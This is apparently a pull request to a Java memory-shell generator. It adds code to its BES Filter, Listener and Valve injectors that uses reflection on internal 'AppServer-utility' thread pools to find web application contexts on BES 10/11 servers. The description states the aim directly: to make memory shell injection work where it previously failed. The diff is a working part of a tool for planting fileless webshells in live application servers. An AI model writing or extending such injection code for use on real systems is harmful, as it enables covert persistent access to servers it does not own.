### PR TITLE
feat(bes): add BES 10/11 context discovery via AppServer-utility thread

### DIFF
--- a/generator/src/main/java/com/reajason/javaweb/memshell/injector/bes/BesFilterInjector.java
+++ b/generator/src/main/java/com/reajason/javaweb/memshell/injector/bes/BesFilterInjector.java
@@ -102,6 +102,47 @@ public class BesFilterInjector {
                 }
             }
         }
+        // BES 10 / BES 11: AppServer-utility thread fallback.
+        // BES 11 target has a wrappedRunnable field; BES 10 does not — try/catch handles both.
+        if (contexts.isEmpty()) {
+            for (Thread thread : threads) {
+                try {
+                    if (!thread.getName().contains("AppServer-utility")) {
+                        continue;
+                    }
+                    Object target = getFieldValue(thread, "target");
+                    Object realTarget = target;
+                    try {
+                        realTarget = getFieldValue(target, "wrappedRunnable");
+                    } catch (Throwable ignored) {
+                    }
+                    Iterable<?> workQueue = (Iterable<?>) getFieldValue(getFieldValue(realTarget, "this$0"), "workQueue");
+                    for (Object task : workQueue) {
+                        if (task == null) {
+                            continue;
+                        }
+                        try {
+                            Object callable = getFieldValue(task, "callable");
+                            Object runnable;
+                            try {
+                                runnable = getFieldValue(callable, "task");
+                            } catch (Throwable ignored) {
+                                runnable = callable;
+                            }
+                            if (runnable == null || !runnable.getClass().getSimpleName().contains("ContainerBackgroundProcessor")) {
+                                continue;
+                            }
+                            Object engine = getFieldValue(runnable, "this$0");
+                            for (Object host : ((Map<?, ?>) getFieldValue(engine, "children")).values()) {
+                                contexts.addAll(((Map<?, ?>) getFieldValue(host, "children")).values());
+                            }
+                        } catch (Throwable ignored) {
+                        }
+                    }
+                } catch (Throwable ignored) {
+                }
+            }
+        }
         return contexts;
     }
 

--- a/generator/src/main/java/com/reajason/javaweb/memshell/injector/bes/BesListenerInjector.java
+++ b/generator/src/main/java/com/reajason/javaweb/memshell/injector/bes/BesListenerInjector.java
@@ -94,6 +94,47 @@ public class BesListenerInjector {
                 }
             }
         }
+        // BES 10 / BES 11: AppServer-utility thread fallback.
+        // BES 11 target has a wrappedRunnable field; BES 10 does not — try/catch handles both.
+        if (contexts.isEmpty()) {
+            for (Thread thread : threads) {
+                try {
+                    if (!thread.getName().contains("AppServer-utility")) {
+                        continue;
+                    }
+                    Object target = getFieldValue(thread, "target");
+                    Object realTarget = target;
+                    try {
+                        realTarget = getFieldValue(target, "wrappedRunnable");
+                    } catch (Throwable ignored) {
+                    }
+                    Iterable<?> workQueue = (Iterable<?>) getFieldValue(getFieldValue(realTarget, "this$0"), "workQueue");
+                    for (Object task : workQueue) {
+                        if (task == null) {
+                            continue;
+                        }
+                        try {
+                            Object callable = getFieldValue(task, "callable");
+                            Object runnable;
+                            try {
+                                runnable = getFieldValue(callable, "task");
+                            } catch (Throwable ignored) {
+                                runnable = callable;
+                            }
+                            if (runnable == null || !runnable.getClass().getSimpleName().contains("ContainerBackgroundProcessor")) {
+                                continue;
+                            }
+                            Object engine = getFieldValue(runnable, "this$0");
+                            for (Object host : ((Map<?, ?>) getFieldValue(engine, "children")).values()) {
+                                contexts.addAll(((Map<?, ?>) getFieldValue(host, "children")).values());
+                            }
+                        } catch (Throwable ignored) {
+                        }
+                    }
+                } catch (Throwable ignored) {
+                }
+            }
+        }
         return contexts;
     }
 

--- a/generator/src/main/java/com/reajason/javaweb/memshell/injector/bes/BesValveInjector.java
+++ b/generator/src/main/java/com/reajason/javaweb/memshell/injector/bes/BesValveInjector.java
@@ -93,6 +93,47 @@ public class BesValveInjector {
                 }
             }
         }
+        // BES 10 / BES 11: AppServer-utility thread fallback.
+        // BES 11 target has a wrappedRunnable field; BES 10 does not — try/catch handles both.
+        if (contexts.isEmpty()) {
+            for (Thread thread : threads) {
+                try {
+                    if (!thread.getName().contains("AppServer-utility")) {
+                        continue;
+                    }
+                    Object target = getFieldValue(thread, "target");
+                    Object realTarget = target;
+                    try {
+                        realTarget = getFieldValue(target, "wrappedRunnable");
+                    } catch (Throwable ignored) {
+                    }
+                    Iterable<?> workQueue = (Iterable<?>) getFieldValue(getFieldValue(realTarget, "this$0"), "workQueue");
+                    for (Object task : workQueue) {
+                        if (task == null) {
+                            continue;
+                        }
+                        try {
+                            Object callable = getFieldValue(task, "callable");
+                            Object runnable;
+                            try {
+                                runnable = getFieldValue(callable, "task");
+                            } catch (Throwable ignored) {
+                                runnable = callable;
+                            }
+                            if (runnable == null || !runnable.getClass().getSimpleName().contains("ContainerBackgroundProcessor")) {
+                                continue;
+                            }
+                            Object engine = getFieldValue(runnable, "this$0");
+                            for (Object host : ((Map<?, ?>) getFieldValue(engine, "children")).values()) {
+                                contexts.addAll(((Map<?, ?>) getFieldValue(host, "children")).values());
+                            }
+                        } catch (Throwable ignored) {
+                        }
+                    }
+                } catch (Throwable ignored) {
+                }
+            }
+        }
         return contexts;
     }
 


### PR DESCRIPTION
Fixes #156

BES 10 and BES 11 memory shell injection fails because `getContext()` returns empty.
The existing paths rely on a thread named `ContainerBackgroundProcessor` or a classloader
matching `.+WebappClassLoader`. On BES 10/11, neither condition is met.

BES 10/11 uses `AppServer-utility` thread pools. The `ContainerBackgroundProcessor` task
is not a dedicated named thread — it is enqueued in the work queue of those utility threads.
The discovery path is:

- `Thread (AppServer-utility) → target → this$0 → workQueue`
- Iterate tasks until one whose runnable contains `ContainerBackgroundProcessor`
- `runnable (this$0: Engine) → children (Hosts) → children (Contexts)`

BES 10 vs BES 11 differ by one layer: BES 11's thread `target` has a `wrappedRunnable`
field; BES 10 does not. Both are handled with a `try/catch` that falls back to the raw
`target` when `wrappedRunnable` is absent.

The new path is guarded by `contexts.isEmpty()` so it only fires when the existing two
paths both fail — no impact on environments where they already work.

Changes: `BesFilterInjector`, `BesListenerInjector`, `BesValveInjector` — fallback path
added in `getContext()`. Agent injectors are unaffected (no `getContext()` call).